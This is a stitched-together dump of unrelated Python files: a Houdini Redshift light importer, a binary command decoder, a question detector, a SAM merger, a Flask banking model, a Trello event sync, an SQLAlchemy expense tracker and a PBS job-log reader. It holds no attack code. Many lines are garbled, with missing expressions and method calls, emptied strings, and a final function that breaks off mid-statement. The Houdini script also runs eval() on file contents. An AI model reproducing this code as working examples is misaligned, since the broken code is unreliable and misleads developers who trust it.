import json def filePath(): """ ask for file path""" filepath = hou.ui.selectFile() return filepath def getData(filename): return eval(open(filename).read(), {"false": False, "true":True}) temp_data = getData(filePath()) for i in range(len(temp_data)): #print(dict[i]) data = temp_data[i] # Create Root Null sceneroot = hou.node('/obj') globalnull = sceneroot.createNode('null', 'size_locator') globalnull.setParms({'scale': 1}) # Create RS_Light light = hou.node("/obj").createNode('rslight', 'Key') light.setInput(0, globalnull) hou.node("obj").layoutChildren() light.parmTuple('t').set(tuple(data["translate"][0])) light.parmTuple('r').set(tuple(data["rotate"][0])) light.parm('RSL_intensityMultiplier').set(data["intensity"]) light.parm('Light1_exposure').set(data["exposure"]) light.parm('RSL_affectDiffuse').set(data["affectsDiffuse"]) light.parm('RSL_bidirectional').set(data["areaBidirectional"]) light.parm('RSL_visible').set(data["areaVisibleInRender"]) light.parm('RSL_volumeScale').set(data["volumeRayContributionScale"]) light.parm('RSL_areaShape').set(data["areaShape"]) light.setGenericFlag(hou.nodeFlag.DisplayComment, True) light.setComment(data["name"]) #attributes = ['scale', 'rotate', 'translate', 'intensity', 'color', 'affectsDiffuse', 'affectsSpecular','areaVisibleInRender', 'areaBidirectional', 'volumeRayContributionScale', # 'exposure', 'areaShape','spotConeAngle', 'areaSamples','areaSpread','on', 'colorR', 'colorG','colorB','temperature','colorMode', 'intensity', # 'exposure', 'unitsType','lumensperwatt','decayType','falloffStart', 'falloffStop', 'shadow', 'shadowTransparency', # 'SAMPLINGOVERRIDES_shadowSamplesScale','SAMPLINGOVERRIDES_numShadowSamples', 'spotConeFalloffAngle', # 'spotConeFalloffCurve','affectedByRefraction', 'emitGiPhotons', 'emitCausticPhotons','normalize', # 'photonIntensityMultiplierGI','photonIntensityMultiplierCaustics','diffuseRayContributionScale', # 'glossyRayContributionScale','singleScatteringRayContributionScale','multipleScatteringRayContributionScale', # 'indirectRayContributionScale', 'indirectMaxTraceDepth', 'volumeRayContributionScale','volumeNumSamples','dropoff']
from struct import unpack import sys, re # Not listed: # @SPLT # @CALL 6# ? FUNCTIONS = { 0x90: "<<", 0x91: ">>", 0x92: "@UDEF2", 0x93: "@DUPL", 0x94: "@EXCH", 0x95: "@UDEF5", 0x96: "@UDEF6", 0x97: "@UDEF7", 0x98: "@UDEF8", 0x99: "@UDEF9", 0x9A: "@UDEFA", 0x9B: "@UDEFB", 0x9C: "@UDEFC", 0x9D: "@UDEFD", 0x9E: "@UDEFE", 0x9F: "@UDEFF", # FUNCTIONS 0xA0: "@F", 0xA1: "@T", 0xA2: "@ABS", 0xA3: "@NEG", 0xA4: "@NOT", 0xA5: "+", 0xA6: "-", 0xA7: "/", 0xA8: "*", 0xA9: "@MAX", 0xAA: "@MIN", 0xAB: "@MOD", 0xAC: "<", 0xAD: ">", 0xAE: "=", 0xAF: "!=", 0xB0: "@AND", 0xB1: "@OR", 0xB2: "@XOR", 0xB3: "@EXT", 0xB4: "@INS", 0xB5: "@ERR", 0xB6: "@IF", 0xB7: "@ELSE", 0xB8: "@ENDIF", 0xB9: "@ISDEF", 0xBE: "(", 0xBF: ")" } class Decoder: def __init__(self, fo): = fo def commands(self): while True: code = self.expect("Command") if code == 0xE0: yield ('MB', self.string(), self.string()) elif code == 0xE1: break elif code == 0xEA: yield ('CO', self.number(), self.string()) elif code == 0xEB: yield ('DT', self.numbers()) elif code == 0xE2: yield ('AS', self.variable(), self.expression()) elif code == 0xE4: yield ('LR', *self.list("String")) elif code == 0xED: yield ('LD', self.string()) # Loading Commands else: yield (code, self.list("Letter", "Number", "Function")) def byte(self): return ord( def type(self): code = self.byte() if code <= 0x8F: return "Number" elif code >= 0x90 and code <= 0xBF: return "Function" elif code >= 0xC1 and code <= 0xDA: return "Letter" elif code >= 0xE0 and code <= 0xFF: return "Command" else: return "Undefined" def peek(self): before = type = self.type() return type def expect(self, *types): type = self.peek() if "Variable" in types and type == "Letter": type = "Variable" elif "String" in types and type == "Number": type = "String" if not type in types: raise Exception("Expected %s: got %s" % (', '.join(types), type)) translate = { "Command": self.byte, "Function": self.function, "Number": self.number, "Letter": self.letter, "Variable": self.variable, "String": self.string } return translate[type]() # Lists def list(self, *types): terms = [] while True: before = try: terms += [self.expect(*types)] except: return terms def section_types(self): terms = [] while self.peek() == "Letter": l = self.expect("Letter") if l == "Y": terms += [l + str(self.number())] else: terms += [l] return terms def letters(self): return self.list("Letter") def numbers(self): return self.list("Number") def expressions(self): return self.expression() # Atomics def term(self): return self.expect("Function", "Number", "Variable") def variable(self): prefix = self.letter() if prefix in "LPRS": suffix = self.number() if suffix: return prefix + str(suffix) else: return prefix elif prefix in "INWXT": return prefix + str(self.number()) elif prefix == "G": return prefix else: return prefix raise Exception("Expected a variable") def expression(self, top = True): return self.list("Variable", "Number", "Function") def function(self): code = self.byte() if not code in FUNCTIONS: raise Exception("Expected a function") return FUNCTIONS[code] def letter(self): code = self.byte() if code >= 0xC1 and code <= 0xDA: return chr(ord('A') + code - 0xC1) else: raise Exception("Expected a letter") def number(self): code = self.byte() if code <= 0x7F: return code elif code == 0x80: return None elif code <= 0x8F: return sum([v << (i * 8) for i, v in enumerate( - 0x80)[::-1])]) else: raise Exception("Expected a number: %2x" % code) def string(self): return
<gh_stars>0 from .nedpy import *
# bot modules from bot.question.emails import EmailQuestion from bot.question.issues import IssueQuestion from bot.question.comments import CommentQuestion import bot.config as config # general python import re import nltk from nltk.tokenize import PunktSentenceTokenizer class QuestionDetector: """Utilizes regex patterns to match questions inside a text.""" def __init__(self, detector_type=None): """ Creates a QuestionDetector of some type. The type holds the origin of the question :param type: one of ['email', 'issue', 'comment'] """ assert detector_type in ["email", "issue", "comment"] self.type = detector_type self.tokenizer = nltk.tokenize.punkt.PunktSentenceTokenizer() self.QUESTION_REGEX = re.compile(r"[A-Z][a-z][^A-Z]*[?]$") self.LOWERED_QUESTION_REGEX = re.compile( r"(how |wh|can |could |do |does |should |would |may |is |are |have |has |will |am ).*[?]$" ) # we can add more regexes to the list below for exceptions self.EXCEPTIONS_REGEX = [config.URL_REGEX] def detect(self, text): """ Detect and create Question objects from input text. Detect the question as follows: 1) First pattern matches questions without lowering the text 2) Second pattern matches questions after having lowered the text :param text : String upon which the detection algorithm runs :return questions : list of Question Objects """ # part 1 questions = self._match_questions(text, self.QUESTION_REGEX) for i, question in enumerate(questions): # padding needed so that (start, end) indexes of Question object are correct padding = "" for _ in text[question.start : question.end]: padding += " " assert len(text) == len( text[: question.start] + padding + text[question.end :] ) # 'hide' already identified question and move on to next text = text[: question.start] + padding + text[question.end :] # part 2 lowered_text = text.lower() # loop needed after first run since _match_questions returns a list (even if empty list) [ questions.append(match) for match in self._match_questions( lowered_text, self.LOWERED_QUESTION_REGEX ) ] # The reason no padding exists here is because we don't have a 3rd regex trying to match if we did # we would have to hide already identified questions in the text from the next pattern return questions def _create_question(self, text, start, end): """Creates <Question obj> based on type""" if self.type == "email": question = EmailQuestion(question_text=text, start_idx=start, end_idx=end) elif self.type == "issue": question = IssueQuestion(question_text=text, start_idx=start, end_idx=end) elif self.type == "comment": question = CommentQuestion(question_text=text, start_idx=start, end_idx=end) return question def _match_questions(self, text, pattern): """ Private class function that returns questions found based on input text and regex patterns. Sentence tokenization is applied before trying to match a Question. :param text : text upon which the detection takes place :param pattern : compiled regex pattern used to detect the questions :return questions : list of Question Objects """ questions = [] # get all exceptions present in the text exceptions = self._get_exception_matches(text) sentences = self.tokenizer.tokenize(text) sentence_indices = list(self.tokenizer.span_tokenize(text)) for i, sentence in enumerate(sentences): matches = sent_start = sentence_indices[i][0] # sent_end = sentence_indices[i][1] if matches is not None: # before appending check if the match is part of any exceptions if self._is_exception(exceptions, continue else: q_start = sent_start + matches.start() q_end = sent_start + matches.end() question = self._create_question(, start=q_start, end=q_end ) questions.append(question) return questions def _get_exception_matches(self, text): """ Returns list of strings inside text that are definitely not questions based on our EXCEPTION_REGEX patterns.We can add multitude of exceptions eg. URLs, code blocks, File, RSEs ... <!> Note: URLs (only exceptions matched for now) :return exceptions: list of string which we should not consider as questions """ exceptions = [] for pattern in self.EXCEPTIONS_REGEX: if is not None: for match in pattern.finditer(text): exceptions.append( return exceptions @staticmethod def _is_exception(exceptions, question): """ Check that the question found is not part of any exceptions. eg. URLs (only exceptions matched for now) :return : Boolean """ for exception in exceptions: if question.lower() in exception.lower(): print("\nFound a Question exception :") print(question, exception) return True return False if __name__ == "__main__": pass
import argparse def merge(infiles, outfile): setReads = set() for infile in infiles: with open(infile, "r") as fileIn: for strLine in fileIn: if strLine.startswith('@'): continue strSplit = strLine.split("\t") if strSplit[2] != '*': setReads.add(strSplit[0]) with open(outfile, "w") as fileOut: for strRead in setReads: fileOut.write(strRead + "\n") return(len(setReads)) def main(): parser = argparse.ArgumentParser() parser.add_argument("infiles", nargs="+", help="sam files you wish to merge") parser.add_argument("outfile", help="output file") args = parser.parse_args() iNumUniqReads = merge(args.infiles, args.outfile) print("Number of merged reads: " + str(iNumUniqReads)) return 0 if __name__ == '__main__': main()
<reponame>flegac/deep-experiments import tkinter as tk import rx.operators as ops from PIL import ImageTk, Image from rx.subject import Subject from data_editor.image.view_controller import ViewController from import DataSource from data_toolbox.image.buffer_factory import ImageFactory class ImageView(tk.Frame): MAX_REDRAW_PER_SEC = 1000 def __init__(self, master: tk.Widget, width: int = 600, height: int = 400): tk.Frame.__init__(self, master) self._source_change_bus = Subject() self._source_change_bus.pipe( ops.throttle_first(1. / ImageView.MAX_REDRAW_PER_SEC), # ops.debounce(1. / ImageView.MAX_REDRAW_PER_SEC), ).subscribe(on_next=lambda _: self._redraw(_)) # canvas creation self.canvas = tk.Canvas(self, width=width, height=height) self.canvas.pack(expand=True, fill="both") # image = None self.image_id = None self.viewport_controller = ViewController(self.canvas, self.set_source) # Bind events to the Canvas self.canvas.bind('<Configure>', lambda _: self._redraw(None)) for k, v in self.viewport_controller.bindings().items(): self.canvas.bind(k, v) def mouse_image_coords(self): return self.viewport_controller.mouse_image_coords() def reset_viewport(self): self.viewport_controller.viewport.zoom_factor = 0 self.viewport_controller.viewport.x = 0 self.viewport_controller.viewport.y = 0 def set_source(self, source: DataSource = None): self._source_change_bus.on_next(source) def _redraw(self, source: DataSource = None): if source is not None: = source.get_data() if self.image_id: self.canvas.delete(self.image_id) if is None: return data = self.viewport_controller.viewport.apply( self.canvas.image = ImageTk.PhotoImage(image=Image.fromarray(data)) self.image_id = self.canvas.create_image((0, 0), anchor=tk.NW, image=self.canvas.image) self.canvas.lower(self.image_id) # set it into background if __name__ == '__main__': root = tk.Tk() editor = ImageView(root) editor.set_source(ImageFactory.random) editor.pack(fill='both', expand=True) root.mainloop()
<gh_stars>0 from datetime import datetime from flask_login import UserMixin from pytz import timezone from . import db def time_now(): IST = timezone('Asia/Kolkata') return class User(db.Model, UserMixin): __tablename__ = "user" id = db.Column(db.Integer, primary_key=True) username = db.Column(db.String(150), nullable=False, unique=True) password = db.Column(db.String(150), nullable=False) balance = db.Column(db.Float(44)) class Transaction(db.Model): __tablename__ = "transaction" id = db.Column(db.Integer, primary_key=True) sender_id = db.Column(db.Integer, db.ForeignKey('')) receiver_id = db.Column(db.Integer, db.ForeignKey('')) amount = db.Column(db.Float(44), nullable=False) date = db.Column(db.DateTime(timezone=True), default=time_now()) @property def repr(self): return {"id":, "date":'%d/%m/%y %H:%M:%S'), "sender_id": self.sender_id, "receiver_id": self.receiver_id, "amount": self.amount} # def as_dict(self): # return { getattr(self, for c in self.__table__.columns}
import datetime import re import time from collections import namedtuple from django.conf import settings from import BaseCommand from trello import ResourceUnavailable, TrelloClient from core.models import Event # Create new command class Command(BaseCommand): help = 'Syncs event in trello board. Need a token.' missing_args_message = ( 'You need to add a token! Get one here: ' '' 'name=My+Application&expiration=1hour&response_type=token' ) def add_arguments(self, parser): parser.add_argument('trello_token', type=str) def handle(self, *args, **options): token = options['trello_token'] events = event_list() sync(events, token) # Get data EventTuple = namedtuple('EventTuple', 'name id city date') def event_list(): event = Event.objects.all() result = [] for e in event: name = _id = str( city = date =,, or 1) result.append(EventTuple(name, _id, city, date)) return result # Sync to trello ADMIN_BASE_URL = '' def sync(events, token): trello = TrelloClient(api_key=settings.TRELLO_API_KEY, token=token) board = trello.get_board('55f7167c46760fcb5d68b385') far_away, less_2_months, less_1_month, less_1_week, today, past = board.all_lists() all_cards = {card_id(c): c for c in board.all_cards()} date_today = for e in events: card = all_cards.get( if not card: card = create_card(e, far_away) create_checklist(card) # fetch card to get due date try: card.fetch() except ResourceUnavailable: print("Oopsie: too many requests! Let's wait 10 seconds!") time.sleep(10) card.fetch() if != print('Changing due date of {} to {}'.format(, card.set_due( distance = ( - date_today).days if distance < 0: right_list = past elif distance == 0: right_list = today elif distance < 7: right_list = less_1_week elif distance < 30: right_list = less_1_month elif distance < 60: right_list = less_2_months else: right_list = far_away ensure_card_in_list(card, right_list) def card_id(card): m = + r'(\d+)', card.desc) return def create_card(event, list): print('Creating card {} ({})'.format(, return list.add_card(, desc=ADMIN_BASE_URL +, def create_checklist(card): card.add_checklist("Things to do:", [ "2 month check", "1 month check", "Thank you email and request for stats", "Stats obtained"]) def ensure_checklist_in_card(card): if not card.checklists: print("Adding checklist to {} card.".format( create_checklist(card) def ensure_card_in_list(card, list): if card.list_id != print('Moving {} to {}'.format(, card.change_list(
<reponame>mychiux413/gubbing<gh_stars>0 import tensorflow as tf from tensorflow.keras import layers, Model class TemporalNetwork(Model): pass
<reponame>fotini-pan/autobot<gh_stars>0 # -*- coding: utf-8 -*- # # This file is part of Invenio. # Copyright (C) 2015-2019 CERN. # # Invenio is free software; you can redistribute it and/or modify it # under the terms of the MIT License; see LICENSE file for more details. """Performs project's configuration loading.""" import os from configparser import ConfigParser from dotenv.main import dotenv_values import autobot.config as config class Config: """Interact with configuration variables.""" dotenv_path = os.path.join(os.path.abspath(os.path.join(__file__, "..")), ".env") ini_parser = ConfigParser() ini_path = os.path.join(os.path.abspath(os.path.join(__file__, "..")), "config.ini") config = {} @classmethod def __init__(cls, **kwargs): """Initialize configuration.""" cls.load_config(**kwargs) @classmethod def load_config(cls, **kwargs): """Get autobot configuration values.""" cls.config = cls.env_config() cls.ini_parser.optionxform = str cls.config.update(cls.ini_config()) cls.config.update(kwargs) py_config = cls.py_config() defaults = { key: py_config[key] for key in py_config if key not in cls.config.keys() } cls.config.update(defaults) cls.config = {key: cls.config[key] for key in py_config} @classmethod def env_config(cls): """Get autobot configuration values from .env file.""" return dotenv_values(cls.dotenv_path) @classmethod def ini_config(cls): """Get autobot configuration values from config.ini file.""" return cls.ini_parser["AUTOBOT"] @classmethod def py_config(cls): """Get autobot configuration values from file.""" res = {} for k in dir(config): if k.startswith("AUTOBOT_"): res.setdefault(k, getattr(config, k)) return res
<gh_stars>10-100 from sqlalchemy import create_engine from sqlalchemy import Column, String, Integer, func, Boolean, Float, desc, text from sqlalchemy.ext.declarative import declarative_base from sqlalchemy.orm import sessionmaker from contextlib import contextmanager from datetime import datetime from import ObjectProperty Base = declarative_base() Session = ObjectProperty() def init_session(f_path): global Session engine = create_engine(f"sqlite:///{f_path}") Session = sessionmaker(bind=engine) @contextmanager def session_scope(): """Provide a transactional scope around a series of operations.""" session = Session() try: yield session session.commit() except: session.rollback() raise finally: session.close() class Items(Base): """Base user class""" __tablename__ = "items" item_id = Column(Integer,primary_key=True) item_name = Column(String) item_link = Column(Integer) active = Column(Boolean) def __init__(self, **kwargs): self.item_id = kwargs['item_id'] self.item_name = kwargs['item_name'] self.item_link = kwargs['item_link'] = kwargs['active'] def get_item(**kwargs): item_name = kwargs['item_name'] item_link = kwargs['item_link'] item_id = None with session_scope() as session: if item_link is None: item = session.query(Items).filter(Items.item_name == item_name).first() else: item = session.query(Items)\ .filter(Items.item_name == item_name, Items.item_link == item_link).first() if item is not None: item_id = item.item_id return item_id def get_all_items(): with session_scope() as session: items = session.query(Items).order_by(Items.item_name).all() item_dict = {} for item in items: item_dict[item.item_id] = {'item_name': item.item_name, 'item_link': item.item_link, 'active':} return item_dict def get_items(**kwargs): item_name = kwargs['item_name'] item_type = kwargs['item_type'] with session_scope() as session: if item_type == 'main': items = session.query(Items).filter(Items.item_link == 0 ,'%{}%'.format(item_name)))\ .order_by(Items.item_name).all() elif item_type == 'sub': items = session.query(Items).filter(Items.item_link != 0 ,'%{}%'.format(item_name)))\ .order_by(Items.item_name).all() elif item_type == 'all': items = session.query(Items).filter('%{}%'.format(item_name)))\ .order_by(Items.item_name).all() item_dict = {} for item in items: item_dict[item.item_id] = {'item_name': item.item_name, 'item_link': item.item_link, 'active':} return item_dict def get_items_by_link(**kwargs): item_link = kwargs['item_link'] with session_scope() as session: items = session.query(Items).filter(Items.item_link == item_link)\ .order_by(Items.item_name).all() item_dict = {} for item in items: item_dict[item.item_id] = {'item_name': item.item_name, 'item_link': item.item_link, 'active':} return item_dict def get_main_items(): with session_scope() as session: items = session.query(Items).filter(Items.item_link == 0).order_by(Items.item_name).all() item_dict = {} for item in items: item_dict[item.item_id] = {'item_name': item.item_name, 'item_link': item.item_link, 'active':} return item_dict def update_active(**kwargs): item_id = kwargs['item_id'] active = kwargs['active'] with session_scope() as session: item = session.query(Items).filter(Items.item_id == item_id).first() if item.item_link == 0: session.query(Items).filter(Items.item_id == item_id).update({'active': active}) session.query(Items).filter(Items.item_link == item_id).update({'active': active}) return 'refresh' else: main_item = session.query(Items).filter(Items.item_id == item.item_link).first() if == False: return 'revert' else: session.query(Items).filter(Items.item_id == item_id).update({'active': active}) return '' def add_item(**kwargs): with session_scope() as session: item = Items(**kwargs) session.add(item) def get_next_item_id(): with session_scope() as session: item_id = session.query(func.max(Items.item_id)).one()[0] if item_id is None: item_id = 1 else: item_id = item_id + 1 return item_id def data_correction(): with session_scope() as session: session.query(Items).filter(Items.item_id == 22).update({'item_link': 0}) session.query(Items).filter(Items.item_id == 28).update({'item_name': 'Bus'}) session.query(Items).filter(Items.item_id == 29).update({'item_name': 'Train'}) item = session.query(Items.item_id).filter(Items.item_link == 25, Items.item_name == 'Flight').first() if item is None: item_id = Items.get_next_item_id() session.add(Items(item_id=item_id, item_name='Flight', item_link=25, active=1)) session.query(Items).filter(Items.item_name == '').delete() class Expenses(Base): """Base user class""" __tablename__ = "expenses" expense_id = Column(Integer, primary_key=True) item_id = Column(Integer) value = Column(Float) date = Column(String) def __init__(self, **kwargs): self.expense_id = kwargs['expense_id'] self.item_id = kwargs['item_id'] self.value = kwargs['value'] = kwargs['date'] def get_expenses(**kwargs): date_type = kwargs['date_type'] query_date = kwargs['date'] with session_scope() as session: if date_type == 'day': expenses = session.query(Expenses.expense_id, Items.item_name, Expenses.value,\ .filter(Items.item_id == Expenses.item_id).filter( == query_date).all() expense_dict = {} for expense in expenses: expense_dict[expense.expense_id] = {'item_name': expense.item_name, 'value': expense.value, 'date':} elif date_type == 'month': month = query_date.strftime("%m") year = query_date.strftime("%Y") expenses = session.query(, func.sum(Expenses.value))\ .filter('%{}-{}-%'.format(year, month)))\ .group_by( expense_dict = {} for expense in expenses: expense_dict[] = expense[1] elif date_type == 'year': query_year = int(query_date.strftime("%Y")) expenses = session.query(Expenses).all() expense_dict = {} for expense in expenses: ex_date = datetime.strptime(, '%Y-%m-%d') if ex_date.year == query_year: if ex_date.strftime('%b') in expense_dict.keys(): expense_dict[ex_date.strftime('%b')] = expense_dict[ex_date.strftime('%b')] + expense.value else: expense_dict[ex_date.strftime('%b')] = expense.value return expense_dict def add_expense(**kwargs): with session_scope() as session: expense = Expenses(**kwargs) session.add(expense) def del_expense(**kwargs): expense_id = kwargs['expense_id'] with session_scope() as session: session.query(Expenses).filter(Expenses.expense_id == expense_id).delete() def get_next_exp_id(): with session_scope() as session: expense_id = session.query(func.max(Expenses.expense_id)).one()[0] if expense_id is None: expense_id = 1 else: expense_id = expense_id + 1 return expense_id def get_borders(): expense_dict = {'MEDay': {'date': '1900-01-01', 'value': 0.0}, 'LEDay': {'date': '1900-01-01', 'value': 0.0}, 'LEMonth': {'date': '1900-01', 'value': 0.0}, 'MEMonth': {'date': '1900-01', 'value': 0.0} } with session_scope() as session: expense = session.query(, func.sum(Expenses.value).label('value_sum'))\ .having(text("value_sum > 0"))\ .group_by('value_sum')).first() if expense is not None: expense_dict['MEDay'] = {'date': expense[0], 'value': expense[1]} expense = session.query(, func.sum(Expenses.value).label('value_sum')) \ .having(text("value_sum > 0")) \ .group_by('value_sum').first() if expense is not None: expense_dict['LEDay'] = {'date': expense[0], 'value': expense[1]} expense = session.query(func.substr(, 1, 7).label('month'), func.sum(Expenses.value).label('value_sum')) \ .having(text("value_sum > 0")) \ .group_by('month').order_by('value_sum').first() if expense is not None: expense_dict['LEMonth'] = {'date': expense[0], 'value': expense[1]} expense = session.query(func.substr(, 1, 7).label('month'), func.sum(Expenses.value).label('value_sum')) \ .having(text("value_sum > 0")) \ .group_by('month').order_by(desc('value_sum')).first() if expense is not None: expense_dict['MEMonth'] = {'date': expense[0], 'value': expense[1]} return expense_dict def get_totals(q_date): query_date = q_date.strftime('%Y-%m-%d') query_month = query_date[0:7] query_year = query_date[0:4] totals = {'day': 0.0, 'month': 0.0, 'year': 0.0} with session_scope() as session: day_total = session.query(func.sum(Expenses.value)) \ .filter( == query_date).group_by( if day_total is not None: totals['day'] = day_total[0] month_query = session.query(func.substr(, 1, 7).label('month'), func.sum(Expenses.value).label('value_sum')) \ .group_by('month') month_subquery = month_query.subquery() month_total = session.query(month_subquery.c.value_sum)\ .filter(month_subquery.c.month == query_month).first() if month_total is not None: totals['month'] = month_total[0] year_query = session.query(func.substr(, 1, 4).label('year'), func.sum(Expenses.value).label('value_sum')) \ .group_by('year') year_subquery = year_query.subquery() year_total = session.query(year_subquery.c.value_sum)\ .filter(year_subquery.c.year == query_year).first() if year_total is not None: totals['year'] = year_total[0] return totals def get_avgs(): expense_dict = {} with session_scope() as session: expense_query = session.query(, func.sum(Expenses.value).label('value_sum')) \ .having(text("value_sum > 0")) \ .group_by( expense = session.query(func.avg(expense_query.c.value_sum)).first() if expense[0] is not None: expense_dict['day_avg'] = expense[0] else: expense_dict['day_avg'] = 0.0 expense_query = session.query(func.substr(, 1, 7).label('month'), func.sum(Expenses.value).label('value_sum')) \ .having(text("value_sum > 0")) \ .group_by('month').subquery() expense = session.query(func.avg(expense_query.c.value_sum)).first() if expense[0] is not None: expense_dict['month_avg'] = expense[0] else: expense_dict['month_avg'] = 0.0 expense_query = session.query(func.substr(, 1, 4).label('year'), func.sum(Expenses.value).label('value_sum')) \ .having(text("value_sum > 0")) \ .group_by('year').subquery() expense = session.query(func.avg(expense_query.c.value_sum)).first() if expense[0] is not None: expense_dict['year_avg'] = expense[0] else: expense_dict['year_avg'] = 0.0 return expense_dict
<gh_stars>0 # -*- coding: utf-8 -*- """ Created on Tue Sep 3 14:53:06 2019 @author: ISHA """ arr = [ [ 'XYZ', 1, 88, 56, 45], [ 'ABC', 2, 45, 86, 52], [ 'LMN', 3, 87, 39, 40], [ 'QWS', 4, 96, 86, 85], [ 'TRE', 5, 76, 56, 53], [ 'UTH', 6, 35, 79, 48], [ 'GHJ', 7, 88, 98, 88], [ 'DFS', 8, 72, 80, 68], [ 'CVB', 9, 45, 56, 50], [ 'PQR', 10, 78, 36, 25]] sumCol=[] for i in range(len(arr)): sumCol.append(0) #sumCol[len(arr)] #j = len(arr[0]); for row in range (0,len(arr)): # sumCol[row] = 0; for col in range(2,len(arr[row])): sumCol[row] = sumCol[row] + arr[row][col] print("Average marks of all Students of T1, T2, T3 : ",sumCol) print("Data of Students with greatest cluster are :") print("- - - - - - - - - - - - - - - - - - - - - -") print("\ Name \ Roll No \ T1 \ T2 \ T3 ") print("- - - - - - - - - - - - - - - - - - - - - -") for i in range(len(arr)): if sumCol[i]>240: for j in range(len(arr[i])): print("\ ",arr[i][j], end='\t') print() print("- - - - - - - - - - - - - - - - - - - - - -")
# (C) Copyright 1996-2018 ECMWF. # # This software is licensed under the terms of the Apache Licence Version 2.0 # which can be obtained at # In applying this licence, ECMWF does not waive the privileges and immunities # granted to it by virtue of its status as an intergovernmental organisation nor # does it submit to any jurisdiction. import csv import os from datetime import datetime from kronos_modeller.kronos_exceptions import ConfigurationError from import IngestedJob, ModelJob from kronos_modeller.logreader.dataset import IngestedDataSet def read_pbs_log(filename_in): pbs_jobs = [] log_list_raw = ['ctime', 'qtime', 'etime', 'end', 'start', 'resources_used.ncpus', 'Resource_List.ncpus', 'resources_used.mem', 'resources_used.cpupercent', 'resources_used.cput', 'group', 'jobname', 'Resource_List.EC_nodes', 'queue' ] # - standardize the key nemes for different PBS log labels.. log_list = ['time_created', 'time_queued', 'time_eligible', 'time_end', 'time_start', 'ncpus', 'ncpus', 'memory_kb', 'cpu_percent', 'cpu_percent', 'group', 'jobname', 'nnodes', 'queue' ] # Read file f_in = open(filename_in, "r") cc = 1 cce = 0 for line in f_in: # array got by splitting the line larray = line.split(" ") b1_array = larray[1].split(";") # block E if (b1_array[1] == "E"): # init dictionary line_dict = {} # user name user_name = b1_array[3].split("=")[1] line_dict["user"] = str(user_name) for jobL in range(0, len(larray)): yval_val = larray[jobL].split("=") # print yval_val if (len(yval_val) == 2): if yval_val[0] in log_list_raw: # find index idx = log_list_raw.index(yval_val[0]) key_name = log_list[idx] line_dict[key_name] = yval_val[1].strip() # special case for ARCTUR PBS.. # Resource_List.nodes=1:ppn=1 if yval_val[0] == "Resource_List.nodes": if len(yval_val[1].split(":")) > 1: line_dict["nnodes"] = int(yval_val[1].split(":")[0]) if yval_val[1].split(":")[1] == "ppn": line_dict["ncpus"] = int(yval_val[2]) * int(yval_val[1].split(":")[0]) else: line_dict["ncpus"] = int(yval_val[1]) i_job = IngestedJob() # print 'i_job.time_created ', line_dict['time_created'] # print 'i_job.time_queued ', line_dict['time_queued'] # print 'i_job.time_eligible', line_dict['time_eligible'] # print 'i_job.time_end ', line_dict['time_end'] # print 'i_job.time_start ', line_dict['time_start'] # print int(line_dict['ncpus']) # print line_dict['time_created'] # print type( line_dict['time_created'] ) # print any(c.isalpha() for c in line_dict['time_created']) # created time if any([c.isalpha() for c in line_dict['time_created']]): i_job.time_created = -1 else: i_job.time_created = int(line_dict['time_created']) # queue time if any([c.isalpha() for c in line_dict['time_queued']]): i_job.time_queued = -1 else: i_job.time_queued = int(line_dict['time_queued']) # eligible time if any([c.isalpha() for c in line_dict['time_eligible']]): i_job.time_eligible = -1 else: i_job.time_eligible = int(line_dict['time_eligible']) # end time if any([c.isalpha() for c in line_dict['time_end']]): i_job.time_end = -1 else: i_job.time_end = int(line_dict['time_end']) # start time if any([c.isalpha() for c in line_dict['time_start']]): i_job.time_start = -1 else: i_job.time_start = int(line_dict['time_start']) # average memory if any([c.isalpha() for c in line_dict['memory_kb'][:-2]]): i_job.memory_kb = -1 else: i_job.memory_kb = int(line_dict['memory_kb'][:-2]) if 'ncpus' in line_dict: i_job.ncpus = int(line_dict['ncpus']) else: i_job.ncpus = -1 if 'nnodes' in line_dict: i_job.nnodes = int(line_dict['nnodes']) else: i_job.nnodes = -1 # i_job.cpu_percent = float(line_dict['cpu_percent'].replace(":", "")) = str(line_dict['group']) i_job.jobname = str(line_dict['jobname']) i_job.user = str(line_dict['user']) i_job.queue_type = str(line_dict['queue']) i_job.cmd_str = None # command line string not available pbs_jobs.append(i_job) cce += 1 cc += 1 # remove invalid entries pbs_jobs[:] = [job for job in pbs_jobs if job.time_start != -1] pbs_jobs[:] = [job for job in pbs_jobs if job.time_end != -1] pbs_jobs[:] = [job for job in pbs_jobs if job.time_end >= job.time_start] pbs_jobs[:] = [job for job in pbs_jobs if job.time_queued != -1] pbs_jobs[:] = [job for job in pbs_jobs if job.time_start >= job.time_queued] pbs_jobs[:] = [job for job in pbs_jobs if job.ncpus > 0] pbs_jobs[:] = [job for job in pbs_jobs if job.nnodes > 0] for (ii, i_job) in enumerate(pbs_jobs): i_job.idx_in_log = ii pbs_jobs.sort(key=lambda x: x.time_start, reverse=False) # times relative to start of log min_start_time = min([i_job.time_start for i_job in pbs_jobs]) for i_job in pbs_jobs: i_job.runtime = float(i_job.time_end) - float(i_job.time_start) i_job.time_start_0 = i_job.time_start - min_start_time i_job.time_in_queue = i_job.time_start - i_job.time_queued return pbs_jobs def read_accounting_logs(filename_in): """ Reads ecmwf accounting logs :param filename_in: :return: """ accounting_jobs = [] # ['"hpc"', # '"jobid"', # '"jobname"', # '"jobstepid"', # '"owner_uid"', # '"owner_group"', # '"submitter_uid"', # '"submitter_group"', # '"queue_time"', # '"start_time"', # '"end_time"', # '"no_nodes"', # '"no_cpus"', # '"class"', # '"account"', # '"usage"', # '"sbu"', # '"step_usertime"', # '"stdin"', # '"stdout"', # '"stderr"', # '"job_name"'] with open(filename_in, 'rb') as csvfile: csv_dict = csv.DictReader(csvfile, delimiter=';', quotechar='"') for line_dict in csv_dict: i_job = IngestedJob() try: i_job.time_queued = (datetime.strptime(line_dict['queue_time'], '%Y-%m-%d %H:%M:%S') - datetime(1970, 1, 1)).total_seconds() except ValueError: i_job.time_queued = (datetime.strptime(line_dict['queue_time'], '%Y-%m-%d %H:%M:%S.%f') - datetime(1970, 1, 1)).total_seconds() try: i_job.time_end = (datetime.strptime(line_dict['end_time'], '%Y-%m-%d %H:%M:%S.%f') - datetime(1970, 1, 1)).total_seconds() except ValueError: i_job.time_end = (datetime.strptime(line_dict['end_time'], '%Y-%m-%d %H:%M:%S') - datetime(1970, 1, 1)).total_seconds() try: i_job.time_start = (datetime.strptime(line_dict['start_time'], '%Y-%m-%d %H:%M:%S.%f') - datetime(1970, 1, 1)).total_seconds() except ValueError: i_job.time_start = (datetime.strptime(line_dict['start_time'], '%Y-%m-%d %H:%M:%S') - datetime(1970, 1, 1)).total_seconds() if 'no_cpus' in 